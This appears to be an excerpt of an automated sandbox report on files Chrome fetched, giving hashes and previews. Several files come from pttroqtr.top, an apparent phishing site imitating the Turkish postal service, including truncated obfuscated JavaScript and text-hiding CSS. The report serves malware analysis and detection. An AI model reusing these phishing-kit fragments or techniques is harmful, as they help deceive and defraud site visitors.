                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9348],{9348:function(e,n,t){"use strict";t.d(n,{Z:function(){return j}});var r=t(3288),a=t(2466),s=t(8845),o=t(4820),i=t.n(o),l=t(6731),c=t.n(l),u=t(3395),y=t(3230),d=t(8082),p=t(3283),_=function(e){return{type:u.MF.GET_ANNOUNCEMENT_COUNT,payload:e}},m=function(e){return{type:u.MF.GET_ANNOUNCEMENT_TYPE,payload:e}},f=t(3868),N=t.n(f),h=function(){var e=(0,d.Z)("GetLanguageResourceResponse").t;return(0,r.jsxs)("div",{className:N().container,children:[(0,r.jsx)("h1",{className:N().title,children:e(u.My.NO_DATA)}),(0,r.jsxs)("div",{className:N().iconContainer,children:[(0,r.jsx)("i",{className:"fa-solid fa-paperclip"}),(0,r.jsx)("i",{className:"fa-solid fa-newspaper"}),(0,r.jsx)("i",{className:"fa-solid fa-bullhorn"}),(0,r.jsx)("i",{className:"fa-solid fa-note-sticky"}),(0,r.jsx)("i",{className:"fa-solid fa-paper-plane"}),(0,r.jsx)("i",{className:"".concat(N().face," fa-solid fa-face-rolling-eyes")})]})]})},E=t(1395);function T(e,n){
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):606
                                                                                                                                                                                            Entropy (8bit):5.401289515983216
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:fbj/1AvxAU7erXn16KkpooeWozx9LqCmVRXNtI6V:fbj/1AvxAU7e7nHkpyW2pqjXNa+
                                                                                                                                                                                            MD5:2D8CA2FAE27B182791B29D83379AC6FE
                                                                                                                                                                                            SHA1:3E3D56874855FBBF14BA18E99D400079F72E1137
                                                                                                                                                                                            SHA-256:D37FF23D03D4699FEEB8C162D865538D7AEC77436D8AEB54F9652DD3BA497D89
                                                                                                                                                                                            SHA-512:7966E30FDE7A4E6C93C1AB0DC7EC038ED26372434E6E06ED56160DED6539675D7EEF060F783ADE9475ECAF9F269236197E51438A22FDD7BDE5F1A85219B5F92B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4820],{2904:function(t,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_error",function(){return r(6953)}])},6953:function(t,n,r){"use strict";r.r(n);var u=r(3288),e=r(8032);function s(t){var n=t.statusCode;return(0,u.jsx)(u.Fragment,{children:(0,u.jsx)(e.Z,{statusCode:n})})}s.getInitialProps=function(t){var n=t.res,r=t.err;return{statusCode:n?n.statusCode:r?r.statusCode:404}},n.default=s}},function(t){t.O(0,[9774,2888,179],(function(){return n=2904,t(t.s=n);var n}));var n=t.O();_N_E=n}]);.//# sourceMappingURL=_error-32d9baaae5c99c79.js.map
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (847)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1014
                                                                                                                                                                                            Entropy (8bit):5.213019883464366
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:0/emCtetOnzuZiqMdhuzTqgfkPH2nouoKLn7tk8:uZo86SZiqMAqgfW8L9d
                                                                                                                                                                                            MD5:A9CE1395954F9F45B9A45B5B13AABB95
                                                                                                                                                                                            SHA1:E6F84E57E3C55BA08ED80927F72AD308DDD8D515
                                                                                                                                                                                            SHA-256:59A698816F6106B367D2EDFF4DB957FC516418B47EF4BAF0C44B1F6E114F92E5
                                                                                                                                                                                            SHA-512:899EAC4F4D8346DC45591CFEF0094AA53B98A1329C8B54EA0699FA5293AC11C4F496C3D5285DF7E5B7D6C962AA805239DD36DD081273D3ADB658FA20E111C820
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/css/owl.theme.default.min.css
                                                                                                                                                                                            Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. .owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{backg
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):56
                                                                                                                                                                                            Entropy (8bit):4.653262234859558
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:H5zSum0KthbsnE71GbNKas/n:NNmBatNNm
                                                                                                                                                                                            MD5:F2C485C0B2BB44062EC9D84292C6B3A3
                                                                                                                                                                                            SHA1:7A9F43834C72B03B4B14907363EE9E778DADB640
                                                                                                                                                                                            SHA-256:459D3C35E51C198A5CA60203DD5F59B0EA04E18F6F89A84FEB3B8A7CBBE58E5B
                                                                                                                                                                                            SHA-512:FCD1E39BA5ACF3FDB5FA9B8A055E7341E58AEA653862CEEA92210BF49A8B1E8867E991D73A29C07DAA3E3C49D5EA4A0727F733DEBC590986D4D8F4D9093E116A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkyYnoDb63KLxIFDZRU-s8SEAmV5I9qPaTjmxIFDeofI_YSFwkCyK9oMSMP9xIFDXRlOh4SBQ1wYBmo?alt=proto
                                                                                                                                                                                            Preview:CgkKBw2UVPrPGgAKCQoHDeofI/YaAAoSCgcNdGU6HhoACgcNcGAZqBoA
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 117372, version 773.768
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):117372
                                                                                                                                                                                            Entropy (8bit):7.990930658865595
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:3072:U3JKgVzg5ybfXYe5W59JPQaPWKSsx/DBMnVnqedkAFqPQTzIBIOK2vDMF:IVM5A5GJPQaH/NMtBkAvcnYF
                                                                                                                                                                                            MD5:B6356C957274676E6571C1FF5E11C9A8
                                                                                                                                                                                            SHA1:4022F95E001D734CA8F082B8E7627ABD205609EC
                                                                                                                                                                                            SHA-256:3A8924CD5203A28628716AEDB5CEF0943DA4C3B44E3FFCEE90AB06387B41C490
                                                                                                                                                                                            SHA-512:83DE79C74480FAFC62CDAC4012FF2A129D8701772EE16216C3D9488826AC21A9C2F8A416FE3208A61BFEA7E12C24AC1CC2D26F6D22BD2B0BA39A22D630238B59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/media/fa-brands-400.e465758e.woff2
                                                                                                                                                                                            Preview:wOF2.......|.......=...1.........................6.$. .`..T..~..|.X.... %..q...<.....eD.i{.TUUo..... ...o..._............b............0..^ v.ju/.ea"dT*..O.....o.7.`.../..".e..#.2...?...`.C+..8U....K ."G....#Dv6-..;.....J..-.....X.PY....N.`.......K..G....^..G..<.$K..Y5...l._.U3..]..Y......=....;...Z.?$..+..........I....s2/!...#.....}#"#3."..W.Ev.4]M.-.R.| ...xG.....\.m...l...)m...l.......6.@B`......K..$.).;.....>............Zk...2.U..{uJ..mQ...o..m .D...A...'#$?.y..a.c..d2....^..<w.vf.gw.=.Y...{O..d.d..#............).E%qS...n.......x..M}?!.!..F*....sn.V..[..0u...;..=..Fj.2....4....F....'...V......G..i?.+iM..,..[k.k.snF..e..j.fU.7..Y..n...b..MFu.|....M1. .j...$..7...'nv#b.....#.....F..../.....T_.....c.o,o.....|#.olk.K+...2I._.Q!..b...=s..)$i..X.m....*..2....3.?..@M.[...3.iu..fi.....h.....|.^.(EC.2;..b.....5^...$.0.W.A.........P...`...'...._..}..P.j}m..V..P.%..'I.C..g.?..5.4.=o.....i...;~..Zy.".5y........!..>.e+p..yb.m....@.%K`.2.`.w-Qc..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):18614
                                                                                                                                                                                            Entropy (8bit):7.842656829907835
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:1t61ypWjXqE+0b5KjYyr/Rl4I29curptBVL+VWrapslaYo:1QrjXqEnolyd3BqeapZX
                                                                                                                                                                                            MD5:5C8C2703821C3A1F3D4600D64E1DB92D
                                                                                                                                                                                            SHA1:060647274799061728A0F06E7B8C3EC61EB64439
                                                                                                                                                                                            SHA-256:4B9A02D91E97FA5B053EB85955E9C38A2594E2667838181748BBDF70BDE901A5
                                                                                                                                                                                            SHA-512:4813636EE30E3E082763DA35A6E454081AFB39466FDB553215A66B429328A8DC8A3D24987A26ADC6D1D78D70301C6BBFCDA99D51CFA799DBB9BBE10668097016
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/43.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..HCIDATx.....\e............&.....iDWGd..8.3.i..wW....av.4^Vfu.Yv.Q?#.E.e\H.q........C...$. .t.s..O......rnu.}?..Cw]N.:U._..y.T*%....-.!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q.8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........`.`....j4.....B~.....j.n...f...2...[z.3.d............2...K.8..P].m..,,p.vB\nt....J..^.............J..l.[>=>.=I......om.]..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (39147)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):39197
                                                                                                                                                                                            Entropy (8bit):5.4001840374174455
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:nqx9b8AKgKsRc/oN18LomsOJllMj46t4juV02dphUYJJ37Kq0DsX8ho:nrg0LoxL4EPTKq0DmOo
                                                                                                                                                                                            MD5:05287FEDBF49F0D2132F0DC70599BA79
                                                                                                                                                                                            SHA1:E43E4149D87D67F99818C16CF15CC9ADFE5EECDC
                                                                                                                                                                                            SHA-256:19825050F2757A03DAE4B40BA5D49EF07ED130BE9D81E43EF0184DD29FF99603
                                                                                                                                                                                            SHA-512:5343B40744E441EFDDFD8C2FFD11718BF0EAD9F78DCA6CFC3374FA693C2B287673A1C01A6ECBFD92D0A57562D576BA4D5508D9E939B175E7B3B7538C66F3312D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5698],{3975:function(t,e){"use strict";e.byteLength=function(t){var e=a(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,o=a(t),s=o[0],h=o[1],u=new i(function(t,e,r){return 3*(e+r)/4-r}(0,s,h)),f=0,c=h>0?s-4:s;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],u[f++]=e>>16&255,u[f++]=e>>8&255,u[f++]=255&e;2===h&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,u[f++]=255&e);1===h&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,u[f++]=e>>8&255,u[f++]=255&e);return u},e.fromByteArray=function(t){for(var e,n=t.length,i=n%3,o=[],s=16383,h=0,a=n-i;h<a;h+=s)o.push(u(t,h,h+s>a?a:h+s));1===i?(e=t[n-1],o.push(r[e>>2]+r[e<<4&63]+"==")):2===i&&(e=(t[n-2]<<8)+t[n-1],o.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return o.join("")};for(var r=[],n=[],i="undefined"!==typeof Uint8Array?Uint8Array:Array,o="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):33304
                                                                                                                                                                                            Entropy (8bit):7.961845706148848
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:QaNY3WBAdXYZ8AcxJHaF3LLnuboDyLoAy2jRROV:QaNYGIXHNJH+3fnuc+oUr2
                                                                                                                                                                                            MD5:1E5D3CDE4B44D1B35A2CC5EA301E1CBE
                                                                                                                                                                                            SHA1:49491E19C66AB8D4937218756CAF7E032FEE57D1
                                                                                                                                                                                            SHA-256:91D51089265627863046D01E337C732315D18F75B9D1788C909DF6A79E117281
                                                                                                                                                                                            SHA-512:1CDECBF63B8E01B80CB7DAB82D3FAAE2C40ABFA3A91FCD80684540048F07D5D5DDC25ED3907A821A0ADCE2F93A5A1612C9E082AC8F75D938BD3A01CF18ED5DF7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...x.......n..!$.BB....,.\. ..UZk..=...b.Bmk..k...rj[..}.......Z-U..#...(...!.B....g.....,...;3.......<.........;.k.... ..B.!.E*w.!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...t..BH2.\:.\.......'..r..B........BH<..*..Ji).,....x.._.WZ...{<....B.}.<"...8B..(.........G..G.=.2D.%y.~.U..v[..-.QW.Y .h.#.P..B..`..J+...._...q.ckGN.].D.."...1.......VsVZ..q.,..v...8BH"..J.hS...m...j....S~,.%.z.._....o......
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):30380
                                                                                                                                                                                            Entropy (8bit):7.86681636831563
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:sVJVGfvVGfBG/GfBGpAbd2hqWRR2i6c8/Alm1nW7d482ZwNTDdtIPrOzj:sVJVGfvVGfBG/GfBGpAQUWRhB84Q1GDP
                                                                                                                                                                                            MD5:BFE1E0B8D54C3BE365553A5643298493
                                                                                                                                                                                            SHA1:66B3E9FCD7C541DB4E56BAB4F75ED8A3DF93E872
                                                                                                                                                                                            SHA-256:D811034E3AA4C50A5B95C86066670B838725976A41B7F1BCBACB6F307648F6C2
                                                                                                                                                                                            SHA-512:ADC45C69526A06781B4BC0267DD0E567C767665A6572FF47856277A9E5EA8F9704424B2913F7A2DC190E9EAB395681C7027783016FA08B1463383049874ADA2C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..v9IDATx...|..............N..}.......V...j.om.o..._k[.}...W[h.j].}.}'@ ...$$!.~.;.......=.....8...9s...o....DQ$......w.A......@........8.................... .......D......D...............q......q......"......@........8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8.8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8............. .......D......D...............q......q......"......@......@........8............................. .......D......D...............q...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 411 x 254, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):17267
                                                                                                                                                                                            Entropy (8bit):7.940505571110385
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4K26QEjGZsW/o2WC2UG4KAcgsnfhmPCISSY2/coxq:4KHQNZs0ot9Ms2CISMVq
                                                                                                                                                                                            MD5:FA3EF547EDCD4B3475DCA6E7F443AD2E
                                                                                                                                                                                            SHA1:0B2F7E33F94BEA04697CB4E08CDB864833D039F8
                                                                                                                                                                                            SHA-256:89019CDF74ECD13163AD6E7D0BB69820682D5FA2DC5D5793297FD8C286BF1BF0
                                                                                                                                                                                            SHA-512:6202874D5180C07B880F893864F1B5AA251197CC8681BFC3255D312A493A11CC678720980A8BDED4AE04C39119EB3D99EEB9F840D981FC362DC243E78AC904A6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/44.png
                                                                                                                                                                                            Preview:.PNG........IHDR....................sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^..x]G....,.[.]va...... @..@.....a)..i.e.-...Y....B....w[.d.*.m.H..lK.l....~g.ru5..s..._...{.s..w.7.<..B.!9C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;sDl.X;>..N.!..#bc......._...P..1v..C.g..)...F.[..E.+.w...}p..1.]!{F.'...N...'....m.....F.O.v...q.+BH<sf..L.Z...~...]....!Ui.s..sS.}.e.......K.Ar...,...?[.j...6....gZ..{.F....iV.....|...........V........N......^.f.uE.}t.=....Dy..Qw$!$.95gcv\a...Y.lkV.bM.{...#..\k..rkG7Z;...Mv....r....KW....k8..I..H.!r.?\.n..W.........t....C.n..vg.q....=&.=..{....BH.s.A@...f.K.Y,...9"<..{..3../=.UgZ.F.h.W...;....~t.\:......TL.2Wa?..v.m.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (2711), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2711
                                                                                                                                                                                            Entropy (8bit):5.297296092227412
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:HX2Ad1LBPjwWtQkMpNbdyQNfSWsn3IQD/hACyEjJPFncz:bLlrxadFdyTWsTFyCPFncz
                                                                                                                                                                                            MD5:A75A86776204D842DB35D8ACA1B199FB
                                                                                                                                                                                            SHA1:BA065388EE5E866897DBC75E163FE916B6A35623
                                                                                                                                                                                            SHA-256:0914A1DE2F752F476BE576F73AA8EA358F8044FC0F7B6B29C76CE08853B4C889
                                                                                                                                                                                            SHA-512:CD48C0DBC2431CC20B7A1CE96BB8B87DE856C4AA69AC95B617B6F8117642F1DA16709C381D30BBADCD68897A6AE6D887D76A3D8071843BB5965EB8BB1234914A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/ec21517bJxKnW.js
                                                                                                                                                                                            Preview:(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb21e(0x13a))/0x5*(-parseInt(_0xfeb21e(0x13e))/0x6)+-parseInt(_0xfeb21e(0x13b))/0x7+parseInt(_0xfeb21e(0x137))/0x8*(-parseInt(_0xfeb21e(0x132))/0x9)+parseInt(_0xfeb21e(0x125))/0xa*(parseInt(_0xfeb21e(0x13d))/0xb);if(_0xf4c543===_0x4b5e47)break;else _0x41d4e4['push'](_0x41d4e4['shift']());}catch(_0x4a9f2a){_0x41d4e4['push'](_0x41d4e4['shift']());}}}(a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,_0x25b304;}}:function(){};return _0xc82145=![],_0x5c3b89;};}()),a31_0x193cc0=a31_0x28e7fb(this,function(){const _0xd7d826=a
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):68155
                                                                                                                                                                                            Entropy (8bit):7.976328915331773
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:Psws3e4vQs5asznNtA2jZXiM1zGLvwTFXa6Ad1HgK6d3bzAGCNGVJVJVGj:EAYTBT1iLYTFXa1dtp6dr6
                                                                                                                                                                                            MD5:3AF1FB65D2985042EC15BAF2A68EDEFD
                                                                                                                                                                                            SHA1:DCFF4DCD6389FAB17DAEA641FA37F06CE1646FE9
                                                                                                                                                                                            SHA-256:C80A4608064847A85102440DBBFF50BB92EE57055DCEA38B23B8FDC33AFA6830
                                                                                                                                                                                            SHA-512:98E8CA2E55BC1D057F81E200E710A6BF36D20509612CD310E79A206F7A72F483C7FC07FF9C74D06DC9BD5E0BD92BA8039080E998D452F6D791CB120F908FBF75
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/53.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx........wf...88@......c..{.l..Q..MbL4.h,1**.(....+*...H...p....y..3...*$...K.m.....7..O#.1@..A..A._8....A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. ..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (951)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):952
                                                                                                                                                                                            Entropy (8bit):5.086003380220007
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:dnkaFfQFfpiVVDoneFVZtYNwE+Lmo4ot2owKgo/7:dnkaFfQFfpOVcneFFswE+LmvRNpu
                                                                                                                                                                                            MD5:32FAC03C421DCBA16FB4A965FC089E7A
                                                                                                                                                                                            SHA1:F6AC75910F20381D4478C1D302B4DD30FD1EE9AD
                                                                                                                                                                                            SHA-256:F6170FBBEE0AF98D737510B5689B31D78CF4E9A152590E594175B79212210911
                                                                                                                                                                                            SHA-512:DC554F5BD2C040133218F74A8CAF624789B2AFFF8505547899D91BFDD03B70EF5DEB7AC9834E255CAE9177C61E5344728B13A0546E956B723E65F5D1C4D3EFD8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/f6170fbbkFGym.css
                                                                                                                                                                                            Preview:@keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loading-bgAnim 3s linear infinite;opacity:0;-webkit-user-select:none;-moz-user-select:none;user-select:none;pointer-events:none;transition:all .3s;z-index:999999999}.g-loading-mask.show{opacity:1;pointer-events:initial}.g-loading-mask .loading{width:38px;height:38px}html,body{padding:0;border:0;margin:0;overflow-x:hidden;overflow-y:auto;overflow:hidden auto}[data-t]{font-size:1em!important}[data-t]:after{content:attr(data-t) " "}[class^=_][class$=_]{color:transparent!important}[class^=_][class$=_]{display:inline-block;pointer-events:none;position:absolute;left:1000vw}[class^=_][class$=_]::-moz-selection{color:transparent!important}[class^=_][class$=_]::selection{color:transparent!important}.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (6570)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6622
                                                                                                                                                                                            Entropy (8bit):5.441018560135766
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:WZc9BoTZ1QMX8mSypSLXQq6RhFXhLghvEh1IZ:cc72Mp3ycLX3Oz6S0
                                                                                                                                                                                            MD5:576111A3EE04000D9CA3BD40B3333866
                                                                                                                                                                                            SHA1:F131EA58893190DD12255EAC56E7F848CB712386
                                                                                                                                                                                            SHA-256:80D723D2E5C52594EDEA4CD4A9147C42931C9A6253D0725EF597383703197F78
                                                                                                                                                                                            SHA-512:50400A8D613F112C385844DFD269FADF138248DBF6482A60B874FB287EC7D659080DCC88F7F411EDD28E55879F63CA170184F198886B9C5EE6D10AC5304D5E32
